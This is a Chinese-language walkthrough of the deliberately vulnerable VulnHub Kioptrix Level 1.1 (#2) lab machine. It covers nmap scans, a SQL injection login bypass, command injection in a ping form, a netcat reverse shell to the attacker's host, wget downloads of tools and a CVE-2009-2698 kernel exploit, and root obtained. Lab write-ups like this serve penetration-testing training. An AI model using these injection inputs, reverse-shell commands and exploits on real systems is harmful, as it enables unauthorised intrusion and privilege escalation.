VulnHub – Kioptrix: Level 1.1 (#2) walkthrough

Kioptrix: Level 1.1 (#2) 介紹與載點
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

利用Nmap找到IP,找到的IP是192.168.112.252

root@hackercat:~/vulnhub/kioptrix-level-2# nmap -sP 192.168.112.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 08:29 EST
Nmap scan report for 192.168.112.1
Host is up (0.0013s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.112.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:F7:2E:D5 (VMware)
Nmap scan report for 192.168.112.252
Host is up (0.00023s latency).
MAC Address: 00:0C:29:CF:1B:EB (VMware)
Nmap scan report for 192.168.112.254
Host is up (0.000098s latency).
MAC Address: 00:50:56:E0:3D:E8 (VMware)
Nmap scan report for 192.168.112.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.23 seconds

利用Nmap進行Port Scan,看看有哪些有趣的服務,
有開啟ssh, http, rpcbind, https, ipp, mysql

root@hackercat:~/vulnhub/kioptrix-level-2# nmap -F -T4 192.168.112.252
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-03 09:11 EST
Nmap scan report for 192.168.112.252
Host is up (0.00077s latency).
Not shown: 94 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 00:0C:29:CF:1B:EB (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds
root@hackercat:~/vulnhub/kioptrix-level-2# cat 192.168.112.252_allPortTCP.txt 
# Nmap 7.80 scan initiated Mon Feb  3 09:12:24 2020 as: nmap -v -sV -Pn -sC -p- -oN 192.168.112.252_allPortTCP.txt 192.168.112.252
Nmap scan report for 192.168.112.252
Host is up (0.0030s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http       Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind    2 (RPC #100000)
443/tcp  open  ssl/https?
|_ssl-date: 2020-02-03T12:03:43+00:00; -2h09m35s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC4_64_WITH_MD5
631/tcp  open  ipp        CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
682/tcp  open  status     1 (RPC #100024)
3306/tcp open  mysql      MySQL (unauthorized)
MAC Address: 00:0C:29:CF:1B:EB (VMware)
Host script results:
|_clock-skew: -2h09m35s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Feb  3 09:14:18 2020 -- 1 IP address (1 host up) scanned in 113.24 seconds

先來查看WEB的服務,到HTTP看,有一個登入畫面。

直覺反應就是先用SQL Injection來試試看,輸入以下:

' or '5'='5

結果就這樣隨便就登入進來啦XDDD

有個功能要我們隨便Ping一個主機,
隨便輸入一個自己的内網IP試試看,
發現他真的會執行並且顯示ping的指令,

這邊就可以嘗試用看看command injection,輸入:

; id

發現又是隨便就注入成功了XD
成功執行了id的指令顯示結果。

既然可以注入指令了,嘗試利用nc來取得reverse shell,
輸入以下指令,第一行是注入的,第二行是本機監聽:

nc -c /bin/sh 192.168.112.128 4444
nc -lvp 4444

結果沒有 可能目標機上面沒有nc
試試看別種reverse shell
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
用bash的成功

不過還是apache的權限,試試看提權,
在本機上先git clone linux-exploit-suggester。
https://github.com/mzet-/linux-exploit-suggester
試過了因為目標上面沒有安裝git ,要用其他方法傳過去。

要把檔案過去有很多方法,這邊用python server,本機執行:

root@hackercat:~/GithubTools/linux-exploit-suggester# ls
CHANGELOG  LICENSE  linux-exploit-suggester.sh  README.md
root@hackercat:~/GithubTools/linux-exploit-suggester# python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 ...

目標機上面用wget抓看看

bash-3.00$ wget http://192.168.112.128:8000/linux-exploit-suggester.sh
--06:38:54--  http://192.168.112.128:8000/linux-exploit-suggester.sh
           => `linux-exploit-suggester.sh'
Connecting to 192.168.112.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 83,454 (81K) [text/x-sh]
linux-exploit-suggester.sh: Permission denied
Cannot write to `linux-exploit-suggester.sh' (Permission denied).

出現以上回應表示權限問題,
要換個資料夾看看,在目標機上面cd到tmp再抓看看,
就OK成功了!

bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.112.128:8000/linux-exploit-suggester.sh
--06:39:48--  http://192.168.112.128:8000/linux-exploit-suggester.sh
           => `linux-exploit-suggester.sh'
Connecting to 192.168.112.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 83,454 (81K) [text/x-sh]
    0K .......... .......... .......... .......... .......... 61%   28.11 MB/s
   50K .......... .......... .......... .                    100%   74.12 MB/s
06:39:48 (36.98 MB/s) - `linux-exploit-suggester.sh' saved [83454/83454]
bash-3.00$ ls
linux-exploit-suggester.sh

結果bash版本太舊沒辦法執行?!!!

bash-3.00$ ./linux-exploit-suggester.sh
bash: ./linux-exploit-suggester.sh: Permission denied
bash-3.00$ chmod +x linux-exploit-suggester.sh
bash-3.00$ ./linux-exploit-suggester.sh
Script needs Bash in version 4.0 or newer. Aborting.

好吧那就…試試看別的方法

bash-3.00$ uname -r
2.6.9-55.EL

從這個kernel下手試試看好了,利用searchsploit,
searchsploit 2.6.9,發現有個看起來滿有趣的:

Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation                                         | exploits/linux/local/1397.c

結果執行了一下沒有這個弱點QQ

google一下找到別的POC
https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/blob/master/2009/CVE-2009-2698/CVE-2009-2698.c

試一下結果成功提權了

root@hackercat:~/vulnhub/kioptrix-level-2# nc -lvp 4444
listening on [any] 4444 ...
192.168.112.252: inverse host lookup failed: Unknown host
connect to [192.168.112.128] from (UNKNOWN) [192.168.112.252] 32774
bash: no job control in this shell
bash-3.00$ id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-3.00$ wget http://192.168.112.128:8000/CVE-2009-2698.c
--06:52:20--  http://192.168.112.128:8000/CVE-2009-2698.c
           => `CVE-2009-2698.c'
Connecting to 192.168.112.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/plain]
CVE-2009-2698.c: Permission denied
Cannot write to `CVE-2009-2698.c' (Permission denied).
bash-3.00$ cd /tmp
bash-3.00$ wget http://192.168.112.128:8000/CVE-2009-2698.c
--06:52:35--  http://192.168.112.128:8000/CVE-2009-2698.c
           => `CVE-2009-2698.c'
Connecting to 192.168.112.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/plain]
    0K ..                                                    100%  420.41 MB/s
06:52:35 (420.41 MB/s) - `CVE-2009-2698.c' saved [2645/2645]
bash-3.00$ gcc CVE-2009-2698.c -o cve
bash-3.00$ ./cve
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

這個也可以
https://www.exploit-db.com/exploits/9542
同樣都是CVE-2009-2698

發佈留言